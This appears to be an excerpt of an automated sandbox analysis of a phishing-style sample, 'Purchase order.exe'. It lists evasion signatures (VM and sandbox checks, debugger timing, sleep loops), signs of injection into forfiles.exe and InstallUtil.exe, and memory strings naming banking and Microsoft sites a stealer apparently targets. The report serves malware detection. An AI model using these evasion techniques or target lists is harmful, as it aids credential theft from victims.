Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Purchase order.exe PID: 2088, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FF9105CD324
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FF9105CD7E4
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FF9105CD944
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FF9105CD504
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FF9105CD544
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FF9105CD1E4
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FF9105D0154
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FF9105CDA44
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Purchase order.exe, 00000000.00000002.1375904708.0000000003481000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Purchase order.exe Memory allocated: 1AC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Memory allocated: 3480000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Memory allocated: 5480000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D096E rdtsc 2_2_017D096E
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\forfiles.exe Window / User API: threadDelayed 9836 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\forfiles.exe API coverage: 2.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Purchase order.exe TID: 6300 Thread sleep count: 190 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe TID: 6320 Thread sleep count: 136 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe TID: 6320 Thread sleep time: -272000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe TID: 6320 Thread sleep count: 9836 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe TID: 6320 Thread sleep time: -19672000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\forfiles.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\forfiles.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0061C3D0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0061C3D0
Source: 3X4eGJ0_.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 3X4eGJ0_.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 3X4eGJ0_.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 3X4eGJ0_.5.dr Binary or memory string: discord.comVMware20,11696487552f
Source: 3X4eGJ0_.5.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 3X4eGJ0_.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 3X4eGJ0_.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Purchase order.exe, 00000000.00000002.1375904708.0000000003481000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: iveUJ72crs3yyPj.exe, 00000008.00000002.2617354376.0000000000C19000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: 3X4eGJ0_.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 3X4eGJ0_.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 3X4eGJ0_.5.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 3X4eGJ0_.5.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 3X4eGJ0_.5.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: 3X4eGJ0_.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: forfiles.exe, 00000005.00000002.2616112369.0000000000985000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 3X4eGJ0_.5.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 3X4eGJ0_.5.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 3X4eGJ0_.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 3X4eGJ0_.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 3X4eGJ0_.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 3X4eGJ0_.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 3X4eGJ0_.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Purchase order.exe, 00000000.00000002.1375904708.0000000003481000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: 3X4eGJ0_.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 3X4eGJ0_.5.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: firefox.exe, 00000009.00000002.2214252053.0000020F4272C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: 3X4eGJ0_.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 3X4eGJ0_.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 3X4eGJ0_.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 3X4eGJ0_.5.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 3X4eGJ0_.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 3X4eGJ0_.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 3X4eGJ0_.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 3X4eGJ0_.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 3X4eGJ0_.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\Purchase order.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D096E rdtsc 2_2_017D096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00417673 LdrLoadDll, 2_2_00417673
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01834180 mov eax, dword ptr fs:[00000030h] 2_2_01834180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01834180 mov eax, dword ptr fs:[00000030h] 2_2_01834180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0184C188 mov eax, dword ptr fs:[00000030h] 2_2_0184C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0184C188 mov eax, dword ptr fs:[00000030h] 2_2_0184C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0181019F mov eax, dword ptr fs:[00000030h] 2_2_0181019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0181019F mov eax, dword ptr fs:[00000030h] 2_2_0181019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0181019F mov eax, dword ptr fs:[00000030h] 2_2_0181019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0181019F mov eax, dword ptr fs:[00000030h] 2_2_0181019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01796154 mov eax, dword ptr fs:[00000030h] 2_2_01796154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01796154 mov eax, dword ptr fs:[00000030h] 2_2_01796154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178C156 mov eax, dword ptr fs:[00000030h] 2_2_0178C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018561C3 mov eax, dword ptr fs:[00000030h] 2_2_018561C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018561C3 mov eax, dword ptr fs:[00000030h] 2_2_018561C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0180E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0180E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0180E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0180E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0180E1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0180E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0180E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0180E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0180E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0180E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017C0124 mov eax, dword ptr fs:[00000030h] 2_2_017C0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018661E5 mov eax, dword ptr fs:[00000030h] 2_2_018661E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017C01F8 mov eax, dword ptr fs:[00000030h] 2_2_017C01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov ecx, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov ecx, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov ecx, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E10E mov ecx, dword ptr fs:[00000030h] 2_2_0183E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01850115 mov eax, dword ptr fs:[00000030h] 2_2_01850115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183A118 mov ecx, dword ptr fs:[00000030h] 2_2_0183A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183A118 mov eax, dword ptr fs:[00000030h] 2_2_0183A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183A118 mov eax, dword ptr fs:[00000030h] 2_2_0183A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183A118 mov eax, dword ptr fs:[00000030h] 2_2_0183A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01824144 mov eax, dword ptr fs:[00000030h] 2_2_01824144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01824144 mov eax, dword ptr fs:[00000030h] 2_2_01824144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01824144 mov ecx, dword ptr fs:[00000030h] 2_2_01824144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01824144 mov eax, dword ptr fs:[00000030h] 2_2_01824144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01824144 mov eax, dword ptr fs:[00000030h] 2_2_01824144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01828158 mov eax, dword ptr fs:[00000030h] 2_2_01828158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01864164 mov eax, dword ptr fs:[00000030h] 2_2_01864164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01864164 mov eax, dword ptr fs:[00000030h] 2_2_01864164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178A197 mov eax, dword ptr fs:[00000030h] 2_2_0178A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178A197 mov eax, dword ptr fs:[00000030h] 2_2_0178A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178A197 mov eax, dword ptr fs:[00000030h] 2_2_0178A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D0185 mov eax, dword ptr fs:[00000030h] 2_2_017D0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017BC073 mov eax, dword ptr fs:[00000030h] 2_2_017BC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01792050 mov eax, dword ptr fs:[00000030h] 2_2_01792050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018280A8 mov eax, dword ptr fs:[00000030h] 2_2_018280A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018560B8 mov eax, dword ptr fs:[00000030h] 2_2_018560B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018560B8 mov ecx, dword ptr fs:[00000030h] 2_2_018560B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178A020 mov eax, dword ptr fs:[00000030h] 2_2_0178A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178C020 mov eax, dword ptr fs:[00000030h] 2_2_0178C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018120DE mov eax, dword ptr fs:[00000030h] 2_2_018120DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018160E0 mov eax, dword ptr fs:[00000030h] 2_2_018160E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h] 2_2_017AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h] 2_2_017AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h] 2_2_017AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h] 2_2_017AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01814000 mov ecx, dword ptr fs:[00000030h] 2_2_01814000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01832000 mov eax, dword ptr fs:[00000030h] 2_2_01832000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01832000 mov eax, dword ptr fs:[00000030h] 2_2_01832000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01832000 mov eax, dword ptr fs:[00000030h] 2_2_01832000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01832000 mov eax, dword ptr fs:[00000030h] 2_2_01832000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01832000 mov eax, dword ptr fs:[00000030h] 2_2_01832000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01832000 mov eax, dword ptr fs:[00000030h] 2_2_01832000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01832000 mov eax, dword ptr fs:[00000030h] 2_2_01832000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01832000 mov eax, dword ptr fs:[00000030h] 2_2_01832000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0178C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D20F0 mov ecx, dword ptr fs:[00000030h] 2_2_017D20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017980E9 mov eax, dword ptr fs:[00000030h] 2_2_017980E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0178A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01826030 mov eax, dword ptr fs:[00000030h] 2_2_01826030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01816050 mov eax, dword ptr fs:[00000030h] 2_2_01816050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017880A0 mov eax, dword ptr fs:[00000030h] 2_2_017880A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179208A mov eax, dword ptr fs:[00000030h] 2_2_0179208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018163C0 mov eax, dword ptr fs:[00000030h] 2_2_018163C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0184C3CD mov eax, dword ptr fs:[00000030h] 2_2_0184C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018343D4 mov eax, dword ptr fs:[00000030h] 2_2_018343D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018343D4 mov eax, dword ptr fs:[00000030h] 2_2_018343D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E3DB mov eax, dword ptr fs:[00000030h] 2_2_0183E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E3DB mov eax, dword ptr fs:[00000030h] 2_2_0183E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E3DB mov ecx, dword ptr fs:[00000030h] 2_2_0183E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183E3DB mov eax, dword ptr fs:[00000030h] 2_2_0183E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178C310 mov ecx, dword ptr fs:[00000030h] 2_2_0178C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017B0310 mov ecx, dword ptr fs:[00000030h] 2_2_017B0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017CA30B mov eax, dword ptr fs:[00000030h] 2_2_017CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017CA30B mov eax, dword ptr fs:[00000030h] 2_2_017CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017CA30B mov eax, dword ptr fs:[00000030h] 2_2_017CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017C63FF mov eax, dword ptr fs:[00000030h] 2_2_017C63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AE3F0 mov eax, dword ptr fs:[00000030h] 2_2_017AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AE3F0 mov eax, dword ptr fs:[00000030h] 2_2_017AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AE3F0 mov eax, dword ptr fs:[00000030h] 2_2_017AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h] 2_2_017A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h] 2_2_017A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h] 2_2_017A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h] 2_2_017A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h] 2_2_017A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h] 2_2_017A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h] 2_2_017A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h] 2_2_017A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0179A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0179A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0179A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0179A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0179A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0179A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h] 2_2_017983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h] 2_2_017983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h] 2_2_017983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h] 2_2_017983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01812349 mov eax, dword ptr fs:[00000030h] 2_2_01812349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01812349 mov eax, dword ptr fs:[00000030h] 2_2_01812349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01812349 mov eax, dword ptr fs:[00000030h] 2_2_01812349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01812349 mov eax, dword ptr fs:[00000030h] 2_2_01812349
